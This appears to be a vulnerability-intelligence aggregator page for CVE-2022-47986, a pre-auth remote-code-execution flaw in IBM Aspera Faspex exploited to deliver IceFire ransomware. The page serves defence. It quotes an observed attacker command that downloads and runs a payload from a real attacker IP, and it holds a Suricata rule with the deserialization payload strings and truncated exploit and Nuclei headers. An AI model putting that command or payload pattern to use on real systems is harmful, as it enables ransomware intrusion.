CVE-2022-47986
published 2023-02-17CVE-2022-47986: IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw…
PriorityP199critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2023-03-14
Exploited in the wild
EPSS
99.97%
100.0th percentile
IBM Aspera Faspex 4.4.2 Patch Level 1 and earlier could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ibm | aspera_faspex | <= 4.4.1 | — |
| ibm | aspera_faspex | — | — |
| ibm | aspera_faspex | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandsh -c rm -f demo iFire && wget hxxp[://]159.65.217.216:8080/demo && wget hxxp[://]159.65.217.216:8080/{redacted_victim_server}/iFire && chmod +x demo && ./demo↗
otherhttp:\/\/159\.65\.217\.216:8080\/\(([a-z]+\.){2}([a-z]+)|^((25[0-5]|(2[0-4]|1\d|[1-9]|)\d)\.?\b){4}\)\/iFire↗
otherMIIBCgKCAQEA0lImq1tu0GPOv0cj78WMTeI+l9Coo0U5VtXj1/13Hds3HVXL5K3+\nZYn/ygsTmRByTU/ZvwoWPqozH4N+RTj0W3MG6KSew1n2duKIkBiexMDN+Ip/qP2w\nFadqimzD/OuBhTwh6LrhX6YVtu9rrpCbhmcsobUurChql0+EOItH/NRL1PpbkDPP\nc0pdChRcv9OQ0Hbz9xsFYnfchqLswzyq2CnuUu+ihjLcIwNd4FsYS+Zw9OCH0gnE\nj6AQgWr0y831JkHRFSEq24DXIXyZD2JZ1Rnts3i/zLSgalop47QeV9DIXOgBGxxK\ndvO6XAEBWx9cYMEk2oTvk50y8/U41+5GFQIDAQAB↗
- →IceFire deletes itself post-encryption; monitor for self-deletion of recently-downloaded ELF binaries on Linux servers. ↗
- →Detect exploitation of CVE-2022-47986 by monitoring for unusual outbound wget/curl requests originating from the IBM Aspera Faspex process, particularly to port 8080. ↗
- →Payloads are downloaded to /opt/aspera/faspex; alert on new executable files written to this path followed by chmod +x and execution. ↗
- →Use the provided regex to detect IceFire payload download URLs in proxy/network logs; wildcard the C2 IP in case of pivot. ↗
- →Presence of the session cookie '_aspera_faspex_session' in traffic to/from 159.65.217.216 indicates attacker reconnaissance or exploitation of a vulnerable Aspera Faspex instance. ↗
- →IceFire skips files with .sh and .cfg extensions and avoids system paths (/boot, /dev, /etc, /lib, /proc, /sys, /usr, /var, /run); focus encryption detection on /home, /mnt, /media, /share, /srv. ↗
- →CVE-2022-47986 exploitation involves a specially crafted obsolete API call; monitor Aspera Faspex web logs for requests to deprecated API endpoints. ↗
- ·The IceFire binary was undetected at time of reporting (0/61 VirusTotal engines), largely due to statically linked OpenSSL functions inflating the binary; signature-based AV is insufficient for detection. ↗
- ·The /srv directory exclusion can be selectively overridden by the attacker; do not rely on default exclusion lists as a containment assumption. ↗
- ·The embedded path referencing user 'Jhone' may be an OpenSSL library artifact rather than a developer indicator; do not treat it as a reliable attribution signal. ↗
- ·The vulnerability is pre-authentication RCE, meaning no user credentials are required for exploitation; perimeter controls relying on authentication are ineffective. ↗
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-3w56-qhmc-wqwr: IBM Aspera Faspex 4
ghsa_unreviewed·2023-02-17
CVE-2022-47986 [CRITICAL] CWE-502 GHSA-3w56-qhmc-wqwr: IBM Aspera Faspex 4
IBM Aspera Faspex 4.4.1 could allow a remote attacker to execute arbitrary code on the system, caused by a YAML deserialization flaw. By sending a specially crafted obsolete API call, an attacker could exploit this vulnerability to execute arbitrary code on the system. The obsolete API call was removed in Faspex 4.4.2 PL2. IBM X-Force ID: 243512.
VulnCheck
IBM Aspera Faspex Code Execution Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-47986 [CRITICAL] CWE-502 IBM Aspera Faspex Code Execution Vulnerability
IBM Aspera Faspex Code Execution Vulnerability
IBM Aspera Faspex could allow a remote attacker to execute code on the system, caused by a YAML deserialization flaw.
Affected: IBM Aspera Faspex
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://twitter.com/Shadowserver/status/1625031735460208642; https://twitter.com/raphaelmendonca/status/1626288868898004993; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.sentinelone.com/labs/icefire-ransomware-returns-now-targeting-linux-enterprise-networks/; https://www.microsoft.com/en-us/security/blog/2023/04/18/nation-state-threat-actor-mint-sandstorm-refines-tradecraft-to-attack-high-value-targets/; https://www.microsoft.co
CISA
IBM Aspera Faspex Code Execution Vulnerability
cisa·2023-02-21·CVSS 9.8
CVE-2022-47986 [CRITICAL] CWE-502 IBM Aspera Faspex Code Execution Vulnerability
Vulnerability: IBM Aspera Faspex Code Execution Vulnerability
Affected: IBM Aspera Faspex
IBM Aspera Faspex could allow a remote attacker to execute code on the system, caused by a YAML deserialization flaw.
Required Action: Apply updates per vendor instructions.
Notes: https://exchange.xforce.ibmcloud.com/vulnerabilities/243512?_ga=2.189195179.1800390251.1676559338-700333034.1676325890; https://nvd.nist.gov/vuln/detail/CVE-2022-47986
Remediation Due Date: 2023-03-14
Suricata
ET WEB_SPECIFIC_APPS IBM Aspera Faspex Pre-Auth RCE Attempt (CVE-2022-47986)
suricata·2024-10-29·CVSS 9.8
CVE-2022-47986 [CRITICAL] ET WEB_SPECIFIC_APPS IBM Aspera Faspex Pre-Auth RCE Attempt (CVE-2022-47986)
ET WEB_SPECIFIC_APPS IBM Aspera Faspex Pre-Auth RCE Attempt (CVE-2022-47986)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS IBM Aspera Faspex Pre-Auth RCE Attempt (CVE-2022-47986)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:42; content:"/aspera/faspex/package_relay/relay_package"; fast_pattern; http.request_body; content:"|22|package_file_list|22 3a|"; content:"socket|3a 20 26|1|20 21|ruby|2f|object|3a|PrettyPrint"; distance:0; content:"method_id|3a 20 3a|eval"; distance:0; content:"newline|3a 20|"; within:30; content:"|22|throw|20|"; within:20; pcre:"/^[^\x26]*?(?:(?:\x3b|%3[Bb])|(?:\x0a|%0[Aa])|(?:\x60|%60)|(?:\x7c|%7[Cc])|(?:\x24|%24))+/R"; reference:cve,2022-47986; reference:url,www.assetnote.io/resources/research/pre-auth-rce-in-as
Exploit-DB
IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
exploitdb·2023-04-07·CVSS 9.8
CVE-2022-47986 [CRITICAL] IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
---
# Exploit Title: IBM Aspera Faspex 4.4.1 - YAML deserialization (RCE)
# Date: 02/02/2023
# Exploit Author: Maurice Lambert
# Vendor Homepage: https://www.ibm.com/
# Software Link: https://www.ibm.com/docs/en/aspera-faspex/5.0?topic=welcome-faspex
# Version: 4.4.1
# Tested on: Linux
# CVE : CVE-2022-47986
"""
This file implements a POC for CVE-2022-47986
an YAML deserialization that causes a RCE in
IBM Aspera Faspex (before 4.4.2).
"""
__version__ = "1.0.0"
__author__ = "Maurice Lambert"
__author_email__ = "[email protected]"
__maintainer__ = "Maurice Lambert"
__maintainer_email__ = "[email protected]"
__description__ = """
This file implements a POC for CVE-2022-47986
an YAML deserialization that causes a RCE
Nuclei
IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution
nuclei·CVSS 9.8
CVE-2022-47986 [CRITICAL] IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution
IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution
IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.
Template:
id: CVE-2022-47986
info:
name: IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution
author: coldfish
severity: critical
description: |
IBM Aspera Faspex through 4.4.2 Patch Level 1 is susceptible to remote code execution via a YAML deserialization flaw. This can allow an attacker to send a specially crafted obsolete API call and thereby execute arbitrary code, obtain sensitive data, and/or execute other unauthorized operations.
im
Bleepingcomputer
IBM warns of critical API Connect auth bypass vulnerability
blogs_bleepingcomputer·2025-12-31·CVSS 9.8
[CRITICAL] IBM warns of critical API Connect auth bypass vulnerability
## IBM warns of critical API Connect auth bypass vulnerability
## Sergiu Gatlan
IBM urged customers to patch a critical authentication bypass vulnerability in its API Connect enterprise platform that could allow attackers to access apps remotely.
API Connect is an application programming interface (API) gateway that enables organizations to develop, test, and manage APIs and provide controlled access to internal services for applications, business partners, and external developers.
Available in on-premises, cloud, or hybrid deployments, API Connect is used by hundreds of companies in banking, healthcare, retail, and telecommunications sectors.
Tracked as CVE-2025-13915 and rated 9.8/10 in severity, this authentication bypass security flaw affects IBM API Connect versions 10.0.11.0 and
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Sentinelone
Prioritizing CVEs in the Cloud
blogs_sentinelone·2025-05-15
Prioritizing CVEs in the Cloud
## Foreword & Guest Bio
As part of this ongoing series, SentinelOne is excited to present a series of guest blogs from cloud security experts covering their views on cloud security best practices. Following on from blogs from Teri Radichel who focused on what AWS security gotchas to avoid and how to address the risk of faulty logic. We now have Rami McCarthy providing his view on cloud CVEs, and approach to vulnerability prioritization.
Rami is a self-proclaimed “security wonk”. Most recently, he helped build the Infrastructure Security program at Figma. Before that, he worked as a security consultant and helped scale security for a health-tech unicorn. He writes extensively about security over at ramimac.me and elsewhere.
## Introduction
Common Vulnerabilities and Exposures (CVEs) are
Sentinelone
Prioritizing CVEs in the Cloud
blogs_sentinelone·2025-05-15
Prioritizing CVEs in the Cloud
## Foreword & Guest Bio
As part of this ongoing series, SentinelOne is excited to present a series of guest blogs from cloud security experts covering their views on cloud security best practices. Following on from blogs from Teri Radichel who focused on what AWS security gotchas to avoid and how to address the risk of faulty logic. We now have Rami McCarthy providing his view on cloud CVEs, and approach to vulnerability prioritization.
Rami is a self-proclaimed “security wonk”. Most recently, he helped build the Infrastructure Security program at Figma. Before that, he worked as a security consultant and helped scale security for a health-tech unicorn. He writes extensively about security over at ramimac.me and elsewhere.
## Introduction
Common Vulnerabilities and Exposures (CVEs) are
Checkpoint
The Platform Matters: A Comparative Study on Linux and Windows Ransomware Attacks
blogs_checkpoint·2023-11-21
CVE-2022-47986 The Platform Matters: A Comparative Study on Linux and Windows Ransomware Attacks
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
AI Research 2
Android Malware 23
Artificial Intelligence 4
ChatGPT 3
Check Point Research Publications 455
Cloud Security 1
CPRadio 44
Crypto 2
Data & Threat Intelligence 2
Data Analysis 0
Demos 22
Global Cyber Attack Reports 408
How To Guides 13
Ransomware 5
Russo-Ukrainian War 1
Security Report 1
Threat and data analysis 0
Threat Research 174
Web 3.0 Security 11
Wipers 0
## The Platform Matters: A Comparative Study on Linux and Windows Ransomware Attacks
Research by: Marc Salinas Fernandez
## Key Points
Check Point Research (CPR) provides a case study of
Sentinelone
Anatomy of a Cloud Incident
blogs_sentinelone·2023-06-14
Anatomy of a Cloud Incident
Cloud computing has fundamentally transformed how modern businesses interact with their data. Having enabled enterprises of all sizes and industries with both freedom and flexibility for the past two decades, cloud technology and services are now a key competitive advantage for many.
In the Cloud Computing Statistics Report by G2, numbers show the steady ascend for cloud-first operations. By 2025, 85% of organizations will be cloud-based and hold over 60% of all corporate data in at least one public or private cloud. These mass waves of cloud adoption have also introduced higher financial stakes. In 2022 alone, cloud technologies represented approximately 25% of the $919 billion spent by enterprises globally.
Given these high financial stakes, data processed and stored on cloud infrastru
Sentinelone
Anatomy of a Cloud Incident | SentinelOne’s Vigilance vs. IceFire Ransomware
blogs_sentinelone·2023-06-14
Anatomy of a Cloud Incident | SentinelOne’s Vigilance vs. IceFire Ransomware
Cloud computing has fundamentally transformed how modern businesses interact with their data. Having enabled enterprises of all sizes and industries with both freedom and flexibility for the past two decades, cloud technology and services are now a key competitive advantage for many.
In the Cloud Computing Statistics Report by G2, numbers show the steady ascend for cloud-first operations. By 2025, 85% of organizations will be cloud-based and hold over 60% of all corporate data in at least one public or private cloud. These mass waves of cloud adoption have also introduced higher financial stakes. In 2022 alone, cloud technologies represented approximately 25% of the $919 billion spent by enterprises globally.
Given these high financial stakes, data processed and stored on cloud infrastru
Sentinelone
IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks
blogs_sentinelone·2023-03-09·CVSS 9.8
CVE-2022-47986 [CRITICAL] IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks
## IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks
## Executive Summary
In recent weeks SentinelLABS observed novel Linux versions of IceFire ransomware being deployed within the enterprise network intrusions of several media and entertainment sector organizations worldwide.
Currently observations indicate the attackers deployed the ransomware by exploiting CVE-2022-47986, a deserialization vulnerability in IBM Aspera Faspex file sharing software.
The operators of the IceFire malware, who previously focused only on targeting Windows, have now expanded their focus to include Linux. This strategic shift is a significant move that aligns them with other ransomware groups who also target Linux systems.
## Background
SentinelLABS recently observed a novel Linux versio
Sentinelone
IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks
blogs_sentinelone·2023-03-09·CVSS 9.8
CVE-2022-47986 [CRITICAL] IceFire Ransomware Returns | Now Targeting Linux Enterprise Networks
## Executive Summary
- In recent weeks SentinelLABS observed novel Linux versions of IceFire ransomware being deployed within the enterprise network intrusions of several media and entertainment sector organizations worldwide.
- Currently observations indicate the attackers deployed the ransomware by exploiting CVE-2022-47986, a deserialization vulnerability in IBM Aspera Faspex file sharing software.
- The operators of the IceFire malware, who previously focused only on targeting Windows, have now expanded their focus to include Linux. This strategic shift is a significant move that aligns them with other ransomware groups who also target Linux systems.
## Background
SentinelLABS recently observed a novel Linux version of the IceFire ransomware being deployed in mid February against en
Checkpoint
27th February – Threat Intelligence Report
blogs_checkpoint·2023-02-27
CVE-2023-20858 27th February – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 27th February – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 27th February, please download our Threat_Intelligence Bulletin
TOP ATTACKS AND BREACHES
Stanford University experienced a data breach in which files containing Economics Ph.D. program admission information were leaked. Personal and health information of 897 applicants might have been exposed.
Dish Network, a major American TV and satellite broadcast provider, had been experiencing an unexplained outage with
Greynoiseio
NoiseLetter
blogs_greynoiseio
NoiseLetter
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/243512https://www.ibm.com/support/pages/node/6952319http://packetstormsecurity.com/files/171772/IBM-Aspera-Faspex-4.4.1-YAML-Deserialization.htmlhttps://exchange.xforce.ibmcloud.com/vulnerabilities/243512https://www.ibm.com/support/pages/node/6952319https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-47986
2023-02-17
Published
2023-02-21
Added to CISA KEV
Exploited in the wild